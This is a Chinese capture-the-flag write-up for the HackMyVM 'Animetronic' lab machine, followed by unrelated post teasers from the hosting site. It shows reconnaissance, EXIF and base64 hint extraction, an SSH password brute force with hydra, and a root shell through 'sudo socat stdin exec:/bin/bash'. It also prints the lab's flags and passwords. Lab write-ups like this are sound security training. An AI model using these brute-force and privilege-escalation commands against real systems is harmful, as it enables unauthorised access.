当前位置：首页 > news >正文

【hackmyvm】 Animetronic靶机

news 2026/2/8 8:13:47

靶机测试

arp-scan
port
url枚举
exiftool
套中套
password
sudo 提权

`
在这里插入图片描述

arp-scan

arp-scan 检测局域网中活动的主机

192.168.9.203    靶机IP地址

port

通过nmap扫描，获取目标主机的端口信息

┌──(root㉿kali)-[/usr/share/seclists]
└─# nmap -sT -sV -O 192.168.9.20322/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))

url枚举

dirsearch目录扫描，默认的字典，扫不出来

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r[07:22:28] 301 -  312B  - /img  ->  http://192.168.9.203/img/               
[07:22:33] 301 -  312B  - /css  ->  http://192.168.9.203/css/               
[07:22:36] 301 -  311B  - /js  ->  http://192.168.9.203/js/                 
[07:38:24] 301 -  319B  - /staffpages  ->  http://192.168.9.203/staffpages/new_employees
[07:41:56] 403 -  278B  - /server-status                                     
[############        ] 60% 134151/220545       119/s       job:1/1  errors:82   
[5]+  已停止               dirsearch -u http://192.168.9.203 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Get a picture,必定有鬼

wget http://192.168.9.203/staffpages/new_employees.jpg

exiftool

┌──(root㉿kali)-[~]
└─# exiftool new_employees.jpeg 
ExifTool Version Number         : 12.49
File Name                       : new_employees.jpeg
Directory                       : .
File Size                       : 160 kB
File Modification Date/Time     : 2023:11:27 12:11:43-05:00
File Access Date/Time           : 2024:05:10 05:52:41-04:00
File Inode Change Date/Time     : 2024:05:10 05:53:33-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
Image Width                     : 703
Image Height                    : 1136
Encoding Process                : Progressive DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 703x1136
Megapixels                      : 0.799

套中套

┌──(root㉿kali)-[~]
└─# echo 'ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=' | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝן

CTF打多了，一眼就看出是倒着的字母 message_for_michael

访问 /staffpages/message_for_michael

Hi MichaelSorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file personal_info.txt

访问/staffpages/personal_info.txt

name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimming

password

通过个人信息生成密码字典

leahcim
michael
19961019
19101996
michael1996
leahcim1996
...

hydra爆破ssh

┌──(root㉿kali)-[~]
└─# hydra -l michael -P password.txt ssh://192.168.9.203[22][ssh] host: 192.168.9.203   login: michael   password: leahcim1996

sudo 提权

在/home目录下发现用户

michael@animetronic:/home$ cd henry/
michael@animetronic:/home/henry$ ls
Note.txt  user.txt
michael@animetronic:/home/henry$ cat user.txt 
0833990328464efff1de6cd93067cfb7
michael@animetronic:/home/henry$ cat Note.txt 
if you need my account to do anything on the server,
you will find my password in file namedaGVucnlwYXNzd29yZC50eHQK
michael@animetronic:/home/henry$ echo 'aGVucnlwYXNzd29yZC50eHQK' | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
michael@animetronic:/home/henry$ cat /home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txt
IHateWilliam

是henry的密码

michael@animetronic:/home/henry$ su henry
Password: 
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_ptyUser henry may run the following commands on animetronic:(root) NOPASSWD: /usr/bin/socat
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
root
cd /root
ls
root.txt
cat root.txt
153a1b940365f46ebed28d74f142530f280a2c0a

【hackmyvm】 Animetronic靶机

靶机测试 arp-scanporturl枚举exiftool套中套passwordsudo 提权 arp-scan arp-scan 检测局域网中活动的主机 192.168.9.203 靶机IP地址port 通过nmap扫描，获取目标主机的端口信息 ┌──(root㉿kali)-[/usr/share/seclists] └─# nmap -sT -sV -O 192.16…...

编程日记 2024/5/11 0:31:03

[附源码]石器时代_恐龙宝贝内购版_三网H5手游_带GM工具

石器时代之恐龙宝贝内购版_三网H5经典怀旧Q萌全网通手游_Linux服务端源码_视频架设教程_GM多功能授权后台_CDK授权后台本教程仅限学习使用，禁止商用，一切后果与本人无关，此声明具有法律效应！！！&#xff0…...

编程日记 2024/5/11 0:30:02

RS2255XN功能和参数介绍及PDF资料

RS2255XN是一款由Runic（润石）公司生产的模拟开关。以下是关于RS2255XN的一些技术参数和特点： 封装：MSOP-10 电源电压范围：2.5V至5.5V 工作温度范围：-40C至125C 类型：模拟开关品牌：R…...

编程日记 2024/5/11 0:29:01

设计模式——外观模式（Facade）

外观模式（Facade Pattern） 是一种结构型设计模式，它为一个子系统中的一组接口提供一个统一的高层接口，使得子系统更加容易使用。这种类型的设计模式属于结构型模式，它向客户端提供了一个接口，隐藏了子系统的…...

编程日记 2024/5/11 0:26:59

【linux软件基础知识】Linux 中的普通进程的调度机制

活动集Active processes和过期集Expired processes 为了实现静态优先级较低的进程没有完全锁定并有机会运行，Linux 调度程序维护两个不相交的可运行进程集：活动集和过期集。此机制是完全公平调度程序 (CFS) 算法的一部分。以下是这两组的工作原理：活动集Active proces…...

编程日记 2024/5/11 0:23:55

keil5软件安装教程（MDKv5.39）

keil5软件安装分为三部分： 目录 1.安装mdk 2.激活mdk 3.安装STM32芯片包 1.安装mdk 安装包链接：链接：https://pan.baidu.com/s/1PZoGhzI5Y19ROv7xe9QJKA?pwdgt3s 提取码：gt3s 1、下载keil5的压缩包并解压，鼠…...

编程日记 2024/5/11 0:22:53

改变视觉创造力：图像合成中基于样式的生成架构的影响和创新

原文地址：revolutionizing-visual-creativity-the-impact-and-innovations-of-style-based-generative 2024 年 4 月 30 日介绍基于风格的生成架构已经开辟了一个利基市场，它将机器学习的技术严谨性与类人创造力的微妙表现力融为一体。这一发展的核…...

编程日记 2024/5/11 0:21:52

【LAMMPS学习】八、基础知识(5.8)LAMMPS 中热化 Drude 振荡器教程

8. 基础知识此部分描述了如何使用 LAMMPS 为用户和开发人员执行各种任务。术语表页面还列出了 MD 术语，以及相应 LAMMPS 手册页的链接。 LAMMPS 源代码分发的 examples 目录中包含的示例输入脚本以及示例脚本页面上突出显示的示例输入脚本还展示了如何设置和运行各…...

编程日记 2024/5/11 0:19:50

基于SpringBoot的全国风景区WebGIS按省展示实践

目录前言一、全国风景区信息介绍 1、全国范围内数据分布 2、全国风景区分布 3、PostGIS空间关联查询二、后台查询的设计与实现 1、Model和Mapper层 2、业务层和控制层设计三、WebGIS可视化 1、省份范围可视化 2、省级风景区可视化展示 3、成果展示总结前…...

编程日记 2024/5/11 0:18:48

深入理解网络原理3----TCP核心特性介绍（上）【面试高频考点】

文章目录前言TCP协议段格式一、确认应答【保证可靠性传输的机制】二、超时重传【保证可靠性传输的机制】三、连接管理机制【保证可靠性传输的机制】3.1建立连接（TCP三次握手）---经典面试题3.2断开连接（四次挥手）3.3TCP状态转换四…...

编程日记 2024/5/11 0:17:47

Java并发编程之锁的艺术：面试与实战指南（三）

Java并发编程之锁的艺术：面试与实战指南（三） 文章目录 Java并发编程之锁的艺术：面试与实战指南（三）前言十七、Java中线程和进程的区别是什么？十八、什么是Java内存模型（JMM&#xff…...

编程日记 2024/5/11 0:16:46

Final Draft 12 for Mac：高效专业剧本创作软件

对于剧本创作者来说，一款高效、专业的写作工具是不可或缺的。Final Draft 12 for Mac就是这样一款完美的选择。这款专为Mac用户设计的剧本创作软件，凭借其卓越的性能和丰富的功能，让您的剧本创作更加得心应手。 Final Draft 12支持多种剧本格…...

编程日记 2024/5/11 0:15:45

php字符串变量和常见的字符串函数

在 PHP 中，字符串变量用于存储文本数据。你可以使用单引号（）、双引号（"）或定界符（heredoc 或 nowdoc）来定义字符串。下面是一些关于 PHP 字符串变量的重要点和示例： 1. 单引号…...

编程日记 2024/5/11 0:14:44

PPT基础

5种ppt仅可读形式 Ⅰ 开始选项卡 1.【幻灯片】组中：新建幻灯片，从大纲中导入幻灯片；修改幻灯片的版式；节（新增节，重命名节）。 2.【字体】组中：设置字体，字体大小&…...

编程日记 2024/5/11 0:13:43

初识JDBC

1、JDBC是什么？ Java DataBase Connectivity(Java语言连接数据库) 2、JDBC的本质是什么？ JDBC是SUN公司制定的一套接口(interface) java.sql.*;(这个包下有很多接口) 接口都有调用者和实现者。面向接口调用、面向接口写实现类，这都属于…...

编程日记 2024/5/11 0:12:42

React 学习-5

React 条件渲染: 与js中的写法一致注意：在 JavaScript 中，true && expression 总是返回 expression，而 false && expression 总是返回 false。因此，如果条件是 true，&& 右侧的元素就会被渲…...

编程日记 2024/5/11 0:11:41

深入浅出TCP 与 UDP

🔥 个人主页：空白诗文章目录 🔥 引言🌐 基础认知概览💻 TCP - 稳健的信使 🛡️🎭 UDP - 敏捷的使者 🏃‍♂️ 🧑‍💻 实战演练：代码示例TCP 服务…...

编程日记 2024/5/11 0:10:39

Leetcode—387. 字符串中的第一个唯一字符【简单】

2024每日刷题（127） Leetcode—387. 字符串中的第一个唯一字符实现代码 class Solution { public:int firstUniqChar(string s) {int count[26] {0};for(char c: s) {count[c - a];}for(int i 0; i < s.length(); i) {if(count[s[i] - a] 1) {re…...

编程日记 2024/5/11 0:07:36

Blazor入门-调用js+例子

参考： Blazor入门笔记（3）-C#与JS交互 - 半野 - 博客园 https://www.cnblogs.com/zxyao/p/12638233.html 本地环境：win10, visual studio 2022 community 其他例子写了再更新！ 调用js函数并传递参数首先要加上injec…...

编程日记 2024/5/11 0:05:33

暴力数据结构之栈与队列（队列详解）

1.队列的定义队列是一种特殊的线性表，它遵循先进先出（FIFO）的原则。在队列中，只允许在表的一端进行插入操作（队尾），而在另一端进行删除操作（队头）。这种数据结构确保了最…...

编程日记 2024/5/11 0:04:32

【大模型RAG】拍照搜题技术架构速览：三层管道、两级检索、兜底大模型

摘要拍照搜题系统采用“三层管道（多模态 OCR → 语义检索 → 答案渲染）、两级检索（倒排 BM25 向量 HNSW）并以大语言模型兜底”的整体框架： 多模态 OCR 层将题目图片经过超分、去噪、倾斜校正后，分别用…...

编程新知 2026/2/8 4:32:38

【位运算】消失的两个数字（hard）

消失的两个数字（hard） 题⽬描述：解法（位运算）：Java 算法代码：更简便代码题⽬链接：⾯试题 17.19. 消失的两个数字题⽬描述： 给定⼀个数组，包含从 1 到 N 所有…...

编程新知 2025/11/15 16:18:24

《Playwright：微软的自动化测试工具详解》

Playwright 简介:声明内容来自网络，将内容拼接整理出来的文档 Playwright 是微软开发的自动化测试工具，支持 Chrome、Firefox、Safari 等主流浏览器，提供多语言 API（Python、JavaScript、Java、.NET）。它的特点包括&a…...

编程新知 2025/7/23 15:00:00

Python爬虫实战：研究feedparser库相关技术

1. 引言 1.1 研究背景与意义在当今信息爆炸的时代，互联网上存在着海量的信息资源。RSS（Really Simple Syndication）作为一种标准化的信息聚合技术，被广泛用于网站内容的发布和订阅。通过 RSS，用户可以方便地获取网站更新的内容，而无需频繁访问各个网站。然而，互联网…...

编程新知 2025/8/18 9:54:31

LeetCode - 394. 字符串解码

题目 394. 字符串解码 - 力扣（LeetCode） 思路使用两个栈：一个存储重复次数，一个存储字符串遍历输入字符串： 数字处理：遇到数字时，累积计算重复次数左括号处理：保存当前状态&a…...

编程新知 2026/1/25 10:09:59

系统设计 --- MongoDB亿级数据查询优化策略

系统设计 --- MongoDB亿级数据查询分表策略背景Solution --- 分表背景使用audit log实现Audi Trail功能 Audit Trail范围: 六个月数据量: 每秒5-7条audi log，共计7千万 – 1亿条数据需要实现全文检索按照时间倒序因为license问题，不能使用ELK只能使用…...

编程新知 2026/1/4 3:47:09

第25节 Node.js 断言测试

Node.js的assert模块主要用于编写程序的单元测试时使用，通过断言可以提早发现和排查出错误。稳定性: 5 - 锁定这个模块可用于应用的单元测试，通过 require(assert) 可以使用这个模块。 assert.fail(actual, expected, message, operator) 使用参数…...

编程新知 2025/10/11 0:24:31

网络编程（UDP编程）

思维导图 UDP基础编程（单播） 1.流程图服务器：短信的接收方创建套接字 (socket)-----------------------------------------》有手机指定网络信息-----------------------------------------------》有号码绑定套接字 (bind)--------------…...

编程新知 2026/2/4 17:31:44